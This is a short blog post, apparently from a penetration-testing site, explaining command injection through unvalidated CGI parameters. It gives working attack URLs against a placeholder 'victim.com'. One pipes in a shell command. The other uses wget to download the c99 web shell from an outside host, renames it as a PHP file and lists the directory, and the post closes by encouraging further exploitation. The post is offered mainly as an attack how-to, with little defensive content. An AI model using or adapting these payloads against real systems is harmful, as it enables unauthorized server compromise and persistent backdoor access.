RCE to shell upload [CGI]

September 27, 2011

Author: Sandeep Kamble
Released Date: September 9, 2010

Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept

information passed from the client as a replacement for the specified target.


1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.

Example site:-

The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag “Input”. Each “Input” tag has a variable name associated with it. This is the variable name that forms the left hand side of the previously mentioned variable=value token. The contents of the variable forms the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the “INput” field. However if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the “Input”
data will pass the data directly to the interpreter. **

http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|

Shell upload command:-

http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|




The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.

After shell upload you can try for more.I hope you find it useful , be safe !

We Provide Penetration Testing

Leave a Reply

Your email address will not be published. Required fields are marked *


We Provide Penetration Testing